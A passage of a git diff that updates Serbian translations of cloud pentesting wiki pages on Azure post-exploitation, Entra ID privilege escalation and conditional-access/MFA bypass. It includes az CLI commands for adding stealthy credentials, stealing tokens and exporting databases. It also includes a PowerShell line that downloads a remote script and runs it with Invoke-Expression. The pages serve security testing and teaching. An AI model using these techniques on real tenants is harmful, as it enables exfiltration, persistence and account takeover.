statusima kako bi ometali funkcionalnost usluge ili izbegli otkrivanje, što ovo čini značajnim rizikom nakon eksploatacije. +Napadač sa dozvolama za kreiranje ili modifikovanje Azure Service Bus redova (da bi modifikovao red, takođe će mu biti potrebna Akcija: `Microsoft.ServiceBus/namespaces/queues/read`) može iskoristiti ovo da presretne podatke, ometa radne tokove ili omogući neovlašćen pristup. Mogu promeniti kritične konfiguracije kao što su prosleđivanje poruka na zlonamerne krajnje tačke, podešavanje TTL poruka za nepropisno zadržavanje ili brisanje podataka, ili omogućavanje dead-lettering-a kako bi ometali obradu grešaka. Pored toga, mogli bi manipulisati veličinama redova, trajanjem zaključavanja ili statusima kako bi ometali funkcionalnost usluge ili izbegli otkrivanje, čineći ovo značajnim rizikom nakon eksploatacije. ```bash az servicebus queue create --resource-group --namespace-name --name az servicebus queue update --resource-group --namespace-name --name ``` -### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) +### Akcije: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) -Napadač sa dozvolama za kreiranje ili modifikovanje tema (da biste modifikovali temu, takođe će vam biti potrebna Akcija: `Microsoft.ServiceBus/namespaces/topics/read`) unutar Azure Service Bus imenskog prostora može to iskoristiti da ometa tokove poruka, izloži osetljive podatke ili omogući neovlašćene radnje. Koristeći komande kao što je az servicebus topic update, mogu manipulisati konfiguracijama kao što su omogućavanje particionisanja za zloupotrebu skalabilnosti, menjanje TTL podešavanja da bi se nepravilno zadržale ili odbacile poruke, ili onemogućavanje detekcije duplikata da bi se zaobišli kontrole. Pored toga, mogli bi prilagoditi limite veličine tema, promeniti status da bi ometali dostupnost, ili konfigurisati ekspresne teme za privremeno skladištenje presretnutih poruka, čineći upravljanje temama kritičnim fokusom za ublažavanje post-ekspolatacije. +Napadač sa dozvolama za kreiranje ili modifikovanje tema (da bi modifikovao temu, takođe će mu biti potrebna Akcija: `Microsoft.ServiceBus/namespaces/topics/read`) unutar Azure Service Bus imenskog prostora može iskoristiti ovo da ometa tokove poruka, otkrije osetljive podatke ili omogući neovlašćene radnje. Koristeći komande kao što je az servicebus topic update, mogu manipulisati konfiguracijama kao što su omogućavanje particionisanja za zloupotrebu skalabilnosti, menjanje TTL podešavanja da bi se nepravilno zadržale ili odbacile poruke, ili onemogućavanje detekcije duplikata da bi se zaobišli kontrole. Pored toga, mogli bi prilagoditi limite veličine tema, promeniti status da bi ometali dostupnost, ili konfigurisati ekspresne teme za privremeno skladištenje presretnutih poruka, čineći upravljanje temama kritičnim fokusom za ublažavanje post-ekspolatacije. ```bash az servicebus topic create --resource-group --namespace-name --name az servicebus topic update --resource-group --namespace-name --name ``` -### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) +### Akcije: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) Napadač sa dozvolama za kreiranje ili modifikovanje pretplata (da bi modifikovao pretplatu, takođe će mu biti potrebna Akcija: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) unutar Azure Service Bus teme može iskoristiti ovo da presretne, preusmeri ili ometa tokove poruka. Koristeći komande kao što je az servicebus topic subscription update, mogu manipulisati konfiguracijama kao što je omogućavanje dead lettering-a za preusmeravanje poruka, prosleđivanje poruka neovlašćenim krajnjim tačkama, ili modifikovanje TTL i trajanja zaključavanja kako bi zadržali ili ometali isporuku poruka. Pored toga, mogu promeniti podešavanja statusa ili maksimalnog broja isporuka kako bi ometali operacije ili izbegli otkrivanje, čineći kontrolu pretplata kritičnim aspektom post-ekspolatacionih scenarija. ```bash az servicebus topic subscription create --resource-group --namespace-name --topic-name --name az servicebus topic subscription update --resource-group --namespace-name --topic-name --name ``` -### Radnje: `AuthorizationRules` Slanje i Primanje Poruka +### Akcije: `AuthorizationRules` Slanje i Primanje Poruka Pogledajte ovde: diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md index cb3527d5c..51ffe96cf 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md @@ -62,7 +62,7 @@ az sql server connection-policy update \ ``` ### "Microsoft.Sql/servers/databases/export/action" -Sa ovom dozvolom, možete eksportovati bazu podataka sa Azure SQL Server-a u nalog za skladištenje. Napadač ili ovlašćeni korisnik sa ovom dozvolom može eksfiltrirati osetljive podatke iz baze podataka izvođenjem na lokaciju koju kontroliše, što predstavlja značajan rizik od curenja podataka. Važno je znati ključ za skladištenje kako biste mogli to da uradite. +Sa ovom dozvolom, možete eksportovati bazu podataka sa Azure SQL Server-a u nalog za skladištenje. Napadač ili ovlašćeni korisnik sa ovom dozvolom može eksfiltrirati osetljive podatke iz baze podataka izvođenjem u lokaciju koju kontroliše, što predstavlja značajan rizik od curenja podataka. Važno je znati ključ za skladištenje kako biste mogli da izvršite ovo. ```bash az sql db export \ --server \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md index b089cf946..67e29b5de 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md @@ -1,10 +1,10 @@ -# Az - Table Storage Post Exploitation +# Az - Post Eksploatacija Tabele Skladišta {{#include ../../../banners/hacktricks-training.md}} -## Table Storage Post Exploitation +## Post Eksploatacija Tabele Skladišta -Za više informacija o table storage, pogledajte: +Za više informacija o skladištu tabela pogledajte: {{#ref}} ../az-services/az-table-storage.md @@ -12,7 +12,7 @@ Za više informacija o table storage, pogledajte: ### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read -Princip sa ovom dozvolom će moći da **prikazuje** tabele unutar table storage i **čita informacije** koje mogu sadržati **osetljive informacije**. +Princip sa ovom dozvolom će moći da **prikazuje** tabele unutar skladišta tabela i **čita informacije** koje mogu sadržati **osetljive informacije**. ```bash # List tables az storage table list --auth-mode login --account-name @@ -26,7 +26,7 @@ az storage entity query \ ``` ### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action -Princip sa ovom dozvolom će moći da **piše i prepisuje unose u tabelama** što bi moglo da mu omogući da izazove neku štetu ili čak eskalira privilegije (npr. prepisivanje nekih pouzdanih podataka koji bi mogli da iskoriste neku ranjivost u aplikaciji koja ih koristi). +Princip sa ovom dozvolom će moći da **piše i prepisuje unose u tabelama** što može omogućiti da izazove neku štetu ili čak eskalira privilegije (npr. prepisivanje nekih pouzdanih podataka koji bi mogli iskoristiti neku ranjivost u aplikaciji koja ih koristi). - Dozvola `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` omogućava sve akcije. - Dozvola `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` omogućava da **dodate** unose. diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md index 5c55c08bc..53bb2b9f0 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -12,7 +12,7 @@ Za više informacija o Azure VMs i umrežavanju, proverite sledeću stranicu: ### VM Application Pivoting -VM aplikacije mogu biti deljene sa drugim pretplatama i zakupcima. Ako se aplikacija deli, verovatno je zato što se koristi. Dakle, ako napadač uspe da **kompromituje aplikaciju i otpremi verziju sa backdoor-om**, može biti moguće da će biti **izvršena u drugom zakupcu ili pretplati**. +VM aplikacije mogu biti deljene sa drugim pretplatama i korisnicima. Ako se aplikacija deli, verovatno je zato što se koristi. Dakle, ako napadač uspe da **kompromituje aplikaciju i otpremi verziju sa backdoor-om**, može biti moguće da će biti **izvršena u drugom korisniku ili pretplati**. ### Sensitive information in images @@ -40,7 +40,7 @@ az sig image-version list \ ```bash az image list -o table ``` -3. **Kreirajte VM iz ID slike** i pretražujte osetljive informacije unutar nje +3. **Kreirajte VM iz ID-a slike** i pretražite osetljive informacije unutar nje ```bash # Create VM from image az vm create \ @@ -75,7 +75,7 @@ az vm disk attach \ --vm-name \ --name ``` -4. **Prikačite** disk i **pretražite osetljive informacije** +4. **Priključite** disk i **pretražite** osetljive informacije {{#tabs }} {{#tab name="Linux" }} @@ -94,9 +94,9 @@ sudo mount /dev/sdX1 /mnt/mydisk {{#tab name="Windows" }} -#### **1. Otvorite Upravljanje diskom** +#### **1. Otvorite Upravljač diskovima** -1. Desni klik na **Start** i izaberite **Upravljanje diskom**. +1. Desni klik na **Start** i izaberite **Upravljač diskovima**. 2. Priključeni disk bi trebao da se pojavi kao **Offline** ili **Nealokiran**. #### **2. Aktivirajte disk** diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md index 1e03e2be0..41fa8a4f0 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md @@ -4,7 +4,7 @@ ## App Services -Za više informacija o Azure App uslugama pogledajte: +Za više informacija o Azure App uslugama, proverite: {{#ref}} ../az-services/az-app-service.md diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md index 6cf84d7d3..8b47d09f5 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -43,7 +43,7 @@ az role definition update --role-definition role.json Ova dozvola omogućava podizanje privilegija i dodeljivanje dozvola bilo kojem principalu za Azure resurse. Namenjena je Entra ID Global Administratorima kako bi mogli da upravljaju dozvolama nad Azure resursima. > [!TIP] -> Mislim da korisnik treba da bude Global Administrator u Entra ID da bi poziv za podizanje radio. +> Mislim da korisnik treba da bude Global Administrator u Entra ID da bi poziv za podizanje privilegija radio. ```bash # Call elevate az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index 9917e0d22..14dce7840 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -9,7 +9,7 @@ ### Uloga: Administrator privilegovanih uloga -Ova uloga sadrži potrebne granularne dozvole da bi mogla da dodeljuje uloge principima i da daje više dozvola ulogama. Ove akcije se mogu zloupotrebiti za eskalaciju privilegija. +Ova uloga sadrži potrebne granularne dozvole za dodeljivanje uloga principima i za davanje više dozvola ulogama. Ove akcije se mogu zloupotrebiti za eskalaciju privilegija. - Dodeli ulogu korisniku: ```bash @@ -52,7 +52,7 @@ az rest --method PATCH \ ### `microsoft.directory/applications/credentials/update` -Ovo omogućava napadaču da **dodaje akreditive** (lozinke ili sertifikate) postojećim aplikacijama. Ako aplikacija ima privilegovane dozvole, napadač može da se autentifikuje kao ta aplikacija i stekne te privilegije. +Ovo omogućava napadaču da **doda kredencijale** (lozinke ili sertifikate) postojećim aplikacijama. Ako aplikacija ima privilegovane dozvole, napadač može da se autentifikuje kao ta aplikacija i stekne te privilegije. ```bash # Generate a new password without overwritting old ones az ad app credential reset --id --append @@ -79,7 +79,7 @@ az ad app owner list --id Napadač može dodati URI za preusmeravanje aplikacijama koje koriste korisnici tenanta i zatim podeliti sa njima URL-ove za prijavu koji koriste novi URL za preusmeravanje kako bi ukrao njihove tokene. Imajte na umu da, ako je korisnik već bio prijavljen u aplikaciju, autentifikacija će biti automatska bez potrebe da korisnik bilo šta prihvati. -Imajte na umu da je takođe moguće promeniti dozvole koje aplikacija zahteva kako bi dobila više dozvola, ali u ovom slučaju korisnik će morati ponovo da prihvati prozor koji traži sve dozvole. +Imajte na umu da je takođe moguće promeniti dozvole koje aplikacija zahteva kako bi dobila više dozvola, ali u ovom slučaju korisnik će morati ponovo da prihvati prompte koji traže sve dozvole. ```bash # Get current redirect uris az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" @@ -95,7 +95,7 @@ Ovo omogućava napadaču da doda akreditive postojećim servisnim principalima. az ad sp credential reset --id --append ``` > [!CAUTION] -> Nova generisana lozinka se neće pojaviti u web konzoli, tako da bi ovo mogla biti stealth metoda za održavanje postojanosti nad servisnim principalom.\ +> Nova generisana lozinka se neće pojaviti u web konzoli, tako da bi ovo mogla biti diskretna metoda za održavanje postojanosti nad servisnim principalom.\ > Iz API-ja se mogu pronaći sa: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` Ako dobijete grešku `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` to je zato što **nije moguće modifikovati svojstvo passwordCredentials** SP-a i prvo ga morate otključati. Za to vam je potrebna dozvola (`microsoft.directory/applications/allProperties/update`) koja vam omogućava da izvršite: @@ -128,13 +128,13 @@ az ad sp credential reset --id --append az ad sp owner list --id ``` > [!CAUTION] -> Nakon što sam dodao novog vlasnika, pokušao sam da ga uklonim, ali API je odgovorio da DELETE metoda nije podržana, čak i ako je to metoda koju treba koristiti za brisanje vlasnika. Dakle, **ne možete ukloniti vlasnike danas**. +> Nakon dodavanja novog vlasnika, pokušao sam da ga uklonim, ali API je odgovorio da DELETE metoda nije podržana, čak i ako je to metoda koju treba koristiti za brisanje vlasnika. Dakle, **ne možete ukloniti vlasnike danas**. ### `microsoft.directory/servicePrincipals/disable` i `enable` -Ove dozvole omogućavaju onemogućavanje i omogućavanje servisnih principala. Napadač bi mogao iskoristiti ovu dozvolu da omogući servisnog principala do kojeg može doći na neki način kako bi eskalirao privilegije. +Ove dozvole omogućavaju onemogućavanje i omogućavanje servisnih principala. Napadač bi mogao iskoristiti ovu dozvolu da omogući servisnog principala do kojem bi mogao doći na neki način kako bi eskalirao privilegije. -Napomena: za ovu tehniku napadač će trebati više dozvola kako bi preuzeo omogućeni servisni principala. +Napomena da će za ovu tehniku napadač trebati više dozvola kako bi preuzeo omogućeni servisni principala. ```bash bashCopy code# Disable az ad sp update --id --account-enabled false @@ -178,7 +178,7 @@ az ad group member add --group --member-id ### `microsoft.directory/groups/owners/update` -Ova dozvola omogućava postajanje vlasnikom grupa. Vlasnik grupe može kontrolisati članstvo u grupi i postavke, potencijalno eskalirajući privilegije u grupi. +Ova dozvola omogućava postajanje vlasnikom grupa. Vlasnik grupe može kontrolisati članstvo i podešavanja grupe, potencijalno povećavajući privilegije unutar grupe. ```bash az ad group owner add --group --owner-object-id az ad group member add --group --member-id @@ -187,7 +187,7 @@ az ad group member add --group --member-id ### `microsoft.directory/groups/members/update` -Ova dozvola omogućava dodavanje članova u grupu. Napadač može dodati sebe ili zlonamerne naloge u privilegovane grupe, što može omogućiti povišen pristup. +Ova dozvola omogućava dodavanje članova u grupu. Napadač bi mogao da doda sebe ili zlonamerne naloge u privilegovane grupe, što može omogućiti povišen pristup. ```bash az ad group member add --group --member-id ``` @@ -274,7 +274,7 @@ az rest --method POST \ ``` ### `microsoft.directory/deviceLocalCredentials/password/read` -Ova dozvola omogućava napadačima da čitaju svojstva rezervnih lokalnih administratorskih naloga za uređaje povezane sa Microsoft Entra, uključujući lozinku. +Ova dozvola omogućava napadačima da čitaju svojstva sačuvanih kredencijala lokalnog administratorskog naloga za uređaje povezane sa Microsoft Entra, uključujući lozinku. ```bash # List deviceLocalCredentials az rest --method GET \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index 9378ebdb8..f49dcdc63 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,22 +1,22 @@ -# Az - Politike uslovnog pristupa i MFA zaobilaženje +# Az - Politike uslovnog pristupa i zaobilaženje MFA {{#include ../../../../banners/hacktricks-training.md}} ## Osnovne informacije -Azure politike uslovnog pristupa su pravila postavljena u Microsoft Azure-u za sprovođenje kontrola pristupa uslugama i aplikacijama u Azure-u na osnovu određenih **uslova**. Ove politike pomažu organizacijama da osiguraju svoje resurse primenom pravih kontrola pristupa pod pravim okolnostima.\ -Politike uslovnog pristupa u osnovi **definišu** **Ko** može da pristupi **Čemu** iz **Gde** i **Kako**. +Azure politike uslovnog pristupa su pravila postavljena u Microsoft Azure-u za sprovođenje kontrola pristupa uslugama i aplikacijama Azure-a na osnovu određenih **uslova**. Ove politike pomažu organizacijama da obezbede svoje resurse primenom pravih kontrola pristupa pod pravim okolnostima.\ +Politike uslovnog pristupa u osnovi **definišu** **Ko** može pristupiti **Čemu** iz **Gde** i **Kako**. Evo nekoliko primera: 1. **Politika rizika prijavljivanja**: Ova politika može biti postavljena da zahteva višefaktorsku autentifikaciju (MFA) kada se otkrije rizik prijavljivanja. Na primer, ako je ponašanje korisnika prilikom prijavljivanja neobično u poređenju sa njihovim redovnim obrascem, kao što je prijavljivanje iz druge zemlje, sistem može zatražiti dodatnu autentifikaciju. -2. **Politika usklađenosti uređaja**: Ova politika može ograničiti pristup Azure uslugama samo na uređaje koji su usklađeni sa bezbednosnim standardima organizacije. Na primer, pristup može biti dozvoljen samo sa uređaja koji imaju ažuriran antivirusni softver ili koji koriste određenu verziju operativnog sistema. +2. **Politika usklađenosti uređaja**: Ova politika može ograničiti pristup uslugama Azure-a samo na uređaje koji su usklađeni sa bezbednosnim standardima organizacije. Na primer, pristup može biti dozvoljen samo sa uređaja koji imaju ažuriran antivirusni softver ili koji koriste određenu verziju operativnog sistema. ## Zaobilaženje politika uslovnog pristupa Moguće je da politika uslovnog pristupa **proverava neke informacije koje se lako mogu izmeniti, što omogućava zaobilaženje politike**. I ako je, na primer, politika konfigurisala MFA, napadač će moći da je zaobiđe. -Prilikom konfigurisanja politike uslovnog pristupa potrebno je naznačiti **korisnike** koji su pogođeni i **ciljne resurse** (kao što su sve cloud aplikacije). +Prilikom konfiguracije politike uslovnog pristupa potrebno je naznačiti **korisnike** koji su pogođeni i **ciljane resurse** (kao što su sve cloud aplikacije). Takođe je potrebno konfigurisati **uslove** koji će **pokrenuti** politiku: @@ -28,19 +28,19 @@ Takođe je potrebno konfigurisati **uslove** koji će **pokrenuti** politiku: - **Klijentske aplikacije**: Opcije su “Pregledač”, “Mobilne aplikacije i desktop klijenti”, “Exchange ActiveSync klijenti” i “Ostali klijenti” - Da bi se zaobišao prijavljivanje sa neodabranom opcijom - **Filter za uređaje**: Moguće je generisati pravilo vezano za korišćeni uređaj -- **Tokovi autentifikacije**: Opcije su “Tok uređajnog koda” i “Prenos autentifikacije” +- **Tokovi autentifikacije**: Opcije su “Tok uređaja” i “Prenos autentifikacije” - Ovo neće uticati na napadača osim ako ne pokušava da zloupotrebi neki od tih protokola u pokušaju phishing-a da pristupi nalogu žrtve -Mogući **rezultati** su: Blokirati ili Dodeliti pristup uz potencijalne uslove kao što su zahtevati MFA, uređaj da bude usklađen... +Mogući **rezultati** su: Blokirati ili Dodeliti pristup uz potencijalne uslove kao što su zahtev za MFA, uređaj da bude usklađen… ### Platforme uređaja - Uslov uređaja -Moguće je postaviti uslov zasnovan na **platformi uređaja** (Android, iOS, Windows, macOS...), međutim, ovo se zasniva na **user-agent-u** pa je lako zaobići. Čak i **ako se sve opcije primenjuju MFA**, ako koristite **user-agent koji nije prepoznat**, moći ćete da zaobiđete MFA ili blokadu: +Moguće je postaviti uslov zasnovan na **platformi uređaja** (Android, iOS, Windows, macOS...), međutim, ovo se zasniva na **user-agent-u** tako da je lako zaobići. Čak i **ako se sve opcije primenjuju za MFA**, ako koristite **user-agent koji nije prepoznat**, moći ćete da zaobiđete MFA ili blokadu:
-Samo slanjem pregledača **nepoznatog user-agent-a** (kao što je `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) dovoljno je da ne pokrene ovaj uslov.\ -Možete promeniti user agent **ručno** u alatima za razvoj: +Samo slanjem nepoznatog user-agent-a (kao što je `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) dovoljno je da ne pokrene ovaj uslov.\ +Možete promeniti user-agent **ručno** u alatima za razvoj:
@@ -48,7 +48,7 @@ Možete promeniti user agent **ručno** u alatima za razvoj: ### Lokacije: Zemlje, IP opsezi - Uslov uređaja -Ako je ovo postavljeno u uslovnoj politici, napadač bi mogao samo da koristi **VPN** u **dozvoljenoj zemlji** ili pokušati da pronađe način da pristupi sa **dozvoljene IP adrese** kako bi zaobišao ove uslove. +Ako je ovo postavljeno u uslovnoj politici, napadač bi mogao samo da koristi **VPN** u **dozvoljenoj zemlji** ili pokušati da pronađe način da pristupi sa **dozvoljene IP adrese** da bi zaobišao ove uslove. ### Cloud aplikacije @@ -56,7 +56,7 @@ Moguće je konfigurisati **politike uslovnog pristupa da blokiraju ili primoraju
-Da biste pokušali da zaobiđete ovu zaštitu, trebali biste videti da li možete **samo u bilo koju aplikaciju**.\ +Da biste pokušali da zaobiđete ovu zaštitu, trebali biste videti da li možete **prijaviti se u bilo koju aplikaciju**.\ Alat [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) ima **desetine ID-eva aplikacija hardkodiranih** i pokušaće da se prijavi u njih i obavestiće vas, pa čak i dati token ako bude uspešan. Da biste **testirali specifične ID-eve aplikacija u specifičnim resursima**, takođe možete koristiti alat kao što je: @@ -65,26 +65,26 @@ roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4 ``` -Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also. +Pored toga, moguće je zaštititi metodu prijavljivanja (npr. ako pokušavate da se prijavite iz pregledača ili iz desktop aplikacije). Alat [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) vrši neke provere kako bi pokušao da zaobiđe ove zaštite. -The tool [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) could also be used to similar purposes although it looks unmantained. +Alat [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) takođe može biti korišćen u slične svrhe, iako izgleda da nije održavan. -The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to test this protections and see if it's possible to bypass MFAs or blocks, but this tool works from a **whitebox** perspective. You first need to download the list of Apps allowed in the tenant and then it will try to login into them. +Alat [**ROPCI**](https://github.com/wunderwuzzi23/ropci) takođe može biti korišćen za testiranje ovih zaštita i proveru da li je moguće zaobići MFA ili blokade, ali ovaj alat radi iz **whitebox** perspektive. Prvo morate preuzeti listu aplikacija koje su dozvoljene u tenant-u, a zatim će pokušati da se prijavi u njih. -## Other Az MFA Bypasses +## Ostali Az MFA zaobilaženja -### Ring tone +### Ton zvona -One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**. +Jedna Azure MFA opcija je da **primite poziv na konfigurisanom broju telefona** gde će biti zatraženo od korisnika da **pošalje znak `#`**. > [!CAUTION] -> As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail. +> Pošto su znakovi samo **tonovi**, napadač bi mogao da **kompromituje** **poruku govora** na broju telefona, da konfiguriše kao poruku **ton `#`** i zatim, kada se zahteva MFA, da osigura da je **telefon žrtve zauzet** (pozivajući ga) tako da se Azure poziv preusmeri na govornu poštu. -### Compliant Devices +### Usklađeni uređaji -Policies often asks for a compliant device or MFA, so an **attacker could register a compliant device**, get a **PRT** token and **bypass this way the MFA**. +Politike često zahtevaju usklađeni uređaj ili MFA, tako da bi **napadač mogao da registruje usklađeni uređaj**, dobije **PRT** token i **na ovaj način zaobiđe MFA**. -Start by registering a **compliant device in Intune**, then **get the PRT** with: +Počnite registracijom **usklađenog uređaja u Intune**, zatim **dobijte PRT** sa: ```powershell $prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\.pfx -Credentials $credentials @@ -94,7 +94,7 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken ``` -Nađite više informacija o ovoj vrsti napada na sledećoj stranici: +Pronađite više informacija o ovoj vrsti napada na sledećoj stranici: {{#ref}} ../../az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -106,7 +106,7 @@ Nađite više informacija o ovoj vrsti napada na sledećoj stranici: Ovaj skript uzima neke korisničke akreditive i proverava da li može da se prijavi u neke aplikacije. -Ovo je korisno da se vidi da li **niste obavezni za MFA da se prijavite u neke aplikacije** koje kasnije možete zloupotrebiti da **povećate privilegije**. +Ovo je korisno da se vidi da li **niste obavezni da koristite MFA za prijavu u neke aplikacije** koje kasnije možete zloupotrebiti da **povećate privilegije**. ### [roadrecon](https://github.com/dirkjanm/ROADtools) @@ -116,17 +116,17 @@ roadrecon plugin policies ``` ### [Invoke-MFASweep](https://github.com/dafthack/MFASweep) -MFASweep je PowerShell skripta koja pokušava da **prijavi na razne Microsoft usluge koristeći dati skup kredencijala i pokušaće da identifikuje da li je MFA omogućena**. U zavisnosti od toga kako su konfigurisana pravila uslovnog pristupa i druge postavke višefaktorske autentifikacije, neki protokoli mogu ostati sa jednim faktorom. Takođe ima dodatnu proveru za ADFS konfiguracije i može pokušati da se prijavi na lokalni ADFS server ako je otkriven. +MFASweep je PowerShell skripta koja pokušava da **prijavi na razne Microsoft usluge koristeći dati skup kredencijala i pokušava da identifikuje da li je MFA omogućena**. U zavisnosti od toga kako su konfigurirane politike uslovnog pristupa i druga podešavanja višefaktorske autentifikacije, neki protokoli mogu ostati sa jednim faktorom. Takođe ima dodatnu proveru za ADFS konfiguracije i može pokušati da se prijavi na on-prem ADFS server ako je otkriven. ```bash Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content Invoke-MFASweep -Username -Password ``` ### [ROPCI](https://github.com/wunderwuzzi23/ropci) -Ovaj alat je pomogao u identifikaciji zaobilaženja MFA i zatim u zloupotrebi API-ja u više produkcionih AAD tenanata, gde su AAD korisnici verovali da imaju MFA primenjen, ali je ROPC zasnovana autentifikacija uspela. +Ovaj alat je pomogao u identifikaciji zaobilaženja MFA i zatim u zloupotrebi API-ja u više produkcionih AAD tenanata, gde su AAD korisnici verovali da imaju primenjen MFA, ali je ROPC zasnovana autentifikacija uspela. > [!TIP] -> Potrebno je da imate dozvole da biste mogli da navedete sve aplikacije kako biste generisali listu aplikacija za brute-force. +> Potrebno je imati dozvole da biste mogli da navedete sve aplikacije kako biste mogli da generišete listu aplikacija za brute-force. ```bash ./ropci configure ./ropci apps list --all --format json -o apps.json @@ -135,7 +135,7 @@ Ovaj alat je pomogao u identifikaciji zaobilaženja MFA i zatim u zloupotrebi AP ``` ### [donkeytoken](https://github.com/silverhack/donkeytoken) -Donkey token je skup funkcija koje imaju za cilj da pomognu bezbednosnim konsultantima koji treba da validiraju politike uslovnog pristupa, testove za Microsoft portale sa 2FA, itd. +Donkey token je skup funkcija koje imaju za cilj da pomognu bezbednosnim konsultantima koji treba da validiraju Politike uslovnog pristupa, testove za Microsoft portale sa 2FA, itd.. 
git clone https://github.com/silverhack/donkeytoken.git
 Import-Module '.\donkeytoken' -Force
@@ -148,7 +148,7 @@ $password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential($username, $password)
 Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
 ```
-Zato što **Azure** **portal** **nije ograničen**, moguće je **prikupiti token sa krajnje tačke portala za pristup bilo kojoj usluzi koja je otkrivena** prethodnom izvršenju. U ovom slučaju, Sharepoint je identifikovan, i traži se token za pristup:
+Zato što **Azure** **portal** **nije ograničen**, moguće je **prikupiti token sa krajnje tačke portala za pristup bilo kojoj usluzi koja je otkrivena** prethodnom izvršenju. U ovom slučaju, Sharepoint je identifikovan, i traži se token za pristup njemu:
 ```powershell
 $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
 Read-JWTtoken -token $token.access_token
@@ -157,7 +157,7 @@ Pretpostavljajući da token ima dozvolu Sites.Read.All (iz Sharepoint-a), čak i
 ```powershell
 $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
 ```
-## References
+## Reference
 
